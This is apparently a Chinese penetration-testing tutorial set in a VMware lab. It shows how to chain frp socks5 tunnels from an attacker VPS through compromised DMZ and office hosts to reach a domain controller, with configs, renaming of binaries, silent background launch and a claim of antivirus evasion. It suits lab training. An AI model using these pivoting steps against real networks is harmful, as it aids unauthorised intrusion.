简介
frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议,采用 Golang 编写,支持跨平台,仅需下载对应平台的二进制文件即可执行,没有额外依赖。frp可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。且frp不会被杀软查杀!!
frp 有windows和linux两个版本, 主要包含以下文件:
frps,服务端程序;frps.ini,服务端配置文件。
frpc,客户端程序;frpc.ini,客户端配置文件。客户端 linux 和 windows 都支持 负责把本地的流量连到服务器
项目地址:https://github.com/fatedier/frp
项目文档:文档 | frp
多层网络实战
测试环境如下,图中右侧有三个内网区域
第一层网络:192.168.10.0/24 vmnet1(仅主机模式)
第二层网络:192.168.20.0/24 vmnet2
第三层网络:192.168.30.0/24 vmnet3
并在真实机中将VMnet1/2/3全部禁用,真是机就访问不到此虚拟网络。
一级网络代理
假设已经获取win2012的控制权,经过弱口令爆破,获取了ubuntu主机的ssh的登录凭据,需要继续渗透并登录ftp服务器的ssh。在win2012上使用frp搭建socks5代理服务器,通过socks5代理连接到ubuntu服务器。
服务端启动
使用vps作为服务端,这里vps为linux,所以下载对应的linux包
然后进行解压,因为是服务端,所以只需要用到frps文件
服务端配置
服务端配置文件frps.ini的内容如下,默认绑定7000端口,等待来自frp客户端的连接。
[common]
bind_port = 7000
启动服务端
./frps
#或者,不指定-c会默认加载这个文件
./frps -c frps.ini
客户端配置
这里客户端为windows,所以下载对应的windows版
需要用到的文件为frpc.exe和frpc.ini,可以将两个文件都改个名字再放上去
客户端配置
客户端配置文件frpc.ini内容如下,指定frp服务端代理的ip、端口以及攻击连接代理服务器的端口1080
[common]
#如果tls_enable为true,则frpc将通过tls连接frps。否则可能运行不起来
tls_enable = true
#指向frp服务端绑定的ip
server_addr = 172.16.2.2
#指向frp服务端绑定的端口
server_port = 7000
[socks5]
#代理所使用的端口,会被转发到服务端
remote_port = 1080
plugin = socks5
启动客户端
使用win2012作为frp客户端,在win2012上执行如下命令,启动frp客户端。如果客户端为linux,启动方式也一样
frpc.exe -c frpc.ini #运行时,按ctrl+c取消 会断开连接
#或
frpc.exe
#或者
start /b frpc.exe -c frpc.ini #按ctrl+c取消,连接也不会断开。但是如果直接关闭此窗口则会断开连接
若客户端为linux
#启动
./frpc
#静默启动
nohup ./frpc >/dev/null 2>&1 &
#停止
ps -aux|grep frp| grep -v grep
kill -9 pid号
此时,成功在win2012与vps之间搭建了一个socks5代理服务。然后,借助第三方工具,可以让计算机的其他应用使用这个代理,如Proxychains、Proxifier等。关于Proxifier的使用 —> https://www.yuque.com/chenchen-dqalz/qe15s1/cvd7gsnyl9067yhn
以Proxychains为例,编辑Proxychains的配置文件vim /etc/proxychains4.conf,将socks5代理服务器的地址指向frp服务端vps的地址,端口为1080
然后在命令前面加上“proxychains”,便可应用此socks5代理
proxychains ssh root@192.168.10.2
通过socks代理登录到内网ubuntu服务器
二级网络代理
获得dmz区域的ubuntu服务器控制权限后,经过信息收集,发现还有一个网段为192.168.20.x的办公区域网,需要继续渗透并登录文件服务器的远程桌面。用frp在dmz区与办公区之间搭建一个二级网络的socks5代理,从而访问办公区的文件服务器。
在vps上执行以下命令,启动frp服务端,服务端配置文件内容默认
[common]
bind_port = 7000
启动服务端
./frps
dmz区win2012上启动frp客户端
客户端frpc.ini内容如下,指定frp服务端代理的ip、端口、攻击连接代理服务器的端口
[common]
tls_enable = true
server_addr = 172.16.2.2
server_port = 7000
[socks5_forward]
type=tcp
#代理所使用的端口,会被转发到服务端
remote_port = 1080
#本地监听的ip
local_ip = 192.168.10.9
#要转发的本地端口
local_port = 10808
在win2012上执行,启动frp客户端,连接vps服务器,同时将本地的10808端口转发到vps的1080端口
frpc.exe
win2012上启动frp服务端
服务端配置文件frps.ini内容如下
[common]
#在win2012上的frp服务端绑定的ip
bind_addr = 192.168.10.9
#在win2012上的frp服务端绑定的端口
bind_port = 7000
启动服务端
./frps
ubuntu启动frp客户端
配置文件frpc.ini内容如下
[common]
tls_enable = true
server_addr = 192.168.10.9
server_port = 7000
[socks5]
type=tcp
remote_port = 10808
plugin = socks5
启动
./frpc
到此,在dmz区与办公区之间搭建了一个二级网络的socks5代理。同样,在/etc/proxychains4.conf最后一行添加“socks5 172.16.2.2 1080”,执行以下命令,即可通过该socks5代理连接办公区文件服务器的远程桌面
proxychains rdesktop 192.168.20.4
此时,即能访问第二层网络,也能访问第一层网络。
三级网络代理
入侵办公区后,经过信息收集,发现还有一个网段为192.168.30.x的核心网络需要继续渗透并登录域控制器的远程桌面。用frp在dmz区、办公区域核心区之间搭建一个三级网络的socks5代理,从而访问核心区的域控制器。
在vps上执行以下命令,启动frp服务端,服务端配置文件内容默认
[common]
bind_port = 7000
启动服务端
./frps
DMZ区win2012上启动frp客户端
客户端frpc.ini内容如下
[common]
tls_enable = true
server_addr = 172.16.2.2
server_port = 7000
[socks5_forward]
type=tcp
#代理所使用的端口
remote_port = 1080
#本地监听的ip
local_ip = 192.168.10.9
#要转发的本地端口
local_port = 10808
在win2012上执行,启动frp客户端,连接vps服务器,同时将本地的10808端口转发到vps的1080端口
frpc.exe
DMZ区win2012上启动frp服务端
服务端配置文件frps.ini内容如下
[common]
#在win2012上的frp服务端绑定的ip
bind_addr = 192.168.10.9
#在win2012上的frp服务端绑定的端口
bind_port = 7000
启动服务端
./frps
DMZ区ubuntu启动frp客户端
配置文件frpc.ini内容如下,将本地10809端口转发到win2012的10808端口
[common]
tls_enable = true
server_addr = 192.168.10.9
server_port = 7000
[socks5_forward]
type=tcp
remote_port = 10808
local_ip = 192.168.20.2
local_port = 10809
启动客户端
./frpc
DMZ区ubuntu启动启动frp服务端
配置文件frps.ini内容如下
[common]
bind_addr = 192.168.20.2
bind_port = 7000
启动服务端
./frps
办公区win2012启动frp客户端
配置文件frpc.ini内容如下,并在10809端口上启动socks5代理服务后,转发到ubuntu服务器的10809端口
[common]
server_addr = 192.168.20.2
server_port = 7000
[socks5]
type=tcp
remote_port = 10809
plugin = socks5
启动客户端
./frpc
到此,三级网络代理搭建完成。同样,在/etc/proxychains4.conf最后一行添加“socks5 172.16.2.2 1080”,执行以下命令,即可通过该socks5代理连接核心区域控制器的远程桌面
参考:《内网渗透体系建设》